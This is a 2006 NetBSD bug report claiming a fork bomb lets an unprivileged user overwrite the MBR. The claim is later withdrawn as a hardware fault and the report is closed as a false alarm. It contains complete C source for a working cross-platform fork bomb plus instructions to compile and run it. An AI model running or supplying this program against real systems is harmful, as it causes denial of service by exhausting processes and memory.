NetBSD Problem Report #33500

From www@NetBSD.org  Wed May 17 08:24:59 2006
Return-Path: <www@NetBSD.org>
Received: by narn.NetBSD.org (Postfix, from userid 31301)
	id B004663B872; Wed, 17 May 2006 08:24:59 +0000 (UTC)
Message-Id: <20060517082459.B004663B872@narn.NetBSD.org>
Date: Wed, 17 May 2006 08:24:59 +0000 (UTC)
From: fenicottero@gmail.com
Reply-To: fenicottero@gmail.com
To: gnats-bugs@NetBSD.org
Subject: Usual nonprivileged user can modify MBR with the help of fork bomb.
X-Send-Pr-Version: www-1.0

>Number:         33500
>Category:       security
>Synopsis:       Usual nonprivileged user can modify MBR with the help of fork bomb.
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    security-officer
>State:          closed
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed May 17 08:25:00 +0000 2006
>Closed-Date:    Thu May 18 20:37:10 +0000 2006
>Last-Modified:  Thu May 18 20:37:10 +0000 2006
>Originator:     Oleg Pilyavets
>Release:        NetBSD 3.0, i386
>Organization:
Moscow Institute of Physics and Technology
>Environment:
NetBSD 3.0, i386 (I can not write more exactly now as I can not boot my NetBSD system already)
>Description:
Usual nonprivileged user can (at least) modify MBR in NetBSD 3.0 with the help of the next fork bomb:

/* A simple cross-platform forkbomb
 * Copyright 2005 ero-sennin and Pe0tr
 *
 * Permission to use, copy, modify, and distribute this software and its
 * documentation for any purpose and without fee is hereby granted, provided
 * that the above copyright notice appears in all copies and that both the
 * copyright notice and this permission notice appear in supporting
 * documentation, and that the same name not be used in advertising or
 * publicity pertaining to distribution of the software without specific,
 * written prior permission. We make no representations about the
 * suitability this software for any purpose. It is provided "as is"
 * without express or implied warranty.
 */

/* adjust the following as needed */
#define MEMSIZE 1048576

#include <stdlib.h>
#include <unistd.h>

#ifndef __unix
#include <windows.h>

char *cmdline;

void fork()
{
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));
        CreateProcess(0, TEXT(cmdline), 0, 0, TRUE, 0, 0, 0, &si, &pi);
}
#endif


int main(int argc, char **argv)
{
#ifndef __unix
        cmdline = argv[0];
#endif
        const int pagesize = getpagesize();
        while(1) {
                fork();
                char *mem = malloc(MEMSIZE);
                char c = 0;
                size_t i;
                for(i = 0; i < MEMSIZE; i += pagesize)
                        mem[i] = c++;
        }
        return 0;
}



***************
You can compile this as
gcc -D__unix myfile.c
And run obtained binary file.
As a resault your system is crushed and can not boot after reboot.


>How-To-Repeat:
You should compile a file listed above as
gcc -D__unix myfile.c
and run obtained a.out.

>Fix:
I don't know how to fix the problem.

>Release-Note:

>Audit-Trail:
From: David Maxwell <david@crlf.net>
To: gnats-bugs@NetBSD.org
Cc: security-officer@netbsd.org, gnats-admin@netbsd.org,
	security-alert@netbsd.org
Subject: Re: security/33500: Usual nonprivileged user can modify MBR with the help of fork bomb.
Date: Wed, 17 May 2006 11:24:49 -0400

 > Usual nonprivileged user can (at least) modify MBR in NetBSD 3.0 with the help of the next fork bomb:

 It seems exceedingly unlikely to me that this process works as described.

 On the host in question, had you booted from the hard disk prior to trying
 this program?

 Since the program would cause any configured swap space to be consumed -
 is it possible that your swap partition overlaps with your MBR?


From: Oleg Pilyavets <fenicottero@gmail.com>
To: gnats-bugs@NetBSD.org
Cc: 
Subject: Re: security/33500: Usual nonprivileged user can modify MBR with the help of fork bomb.
Date: Thu, 18 May 2006 20:42:55 +0400

 On Wed, May 17, 2006 at 15:30 +0000, David Maxwell wrote:
 > The following reply was made to PR security/33500; it has been noted by GNATS.
 > 
 > From: David Maxwell <david@crlf.net>
 > To: gnats-bugs@NetBSD.org
 > Cc: security-officer@netbsd.org, gnats-admin@netbsd.org,
 > 	security-alert@netbsd.org
 > Subject: Re: security/33500: Usual nonprivileged user can modify MBR with the help of fork bomb.
 > Date: Wed, 17 May 2006 11:24:49 -0400
 > 
 >  > Usual nonprivileged user can (at least) modify MBR in NetBSD 3.0 with the help of the next fork bomb:
 >  
 >  It seems exceedingly unlikely to me that this process works as described.
 >  
 >  On the host in question, had you booted from the hard disk prior to trying
 >  this program?
 >  
 >  Since the program would cause any configured swap space to be consumed -
 >  is it possible that your swap partition overlaps with your MBR?
 >  
 >  

 Thank you very much, I solved my problem. It was a hardware problem with my old hard disk.

State-Changed-From-To: open->closed
State-Changed-By: dan@netbsd.org
State-Changed-When: Thu, 18 May 2006 20:37:10 +0000
State-Changed-Why:
false alarm


>Unformatted:

NetBSD Home
NetBSD PR Database Search

(Contact us) $NetBSD: query-full-pr,v 1.39 2013/11/01 18:47:49 spz Exp $
$NetBSD: gnats_config.sh,v 1.8 2006/05/07 09:23:38 tsutsui Exp $
Copyright © 1994-2007 The NetBSD Foundation, Inc. ALL RIGHTS RESERVED.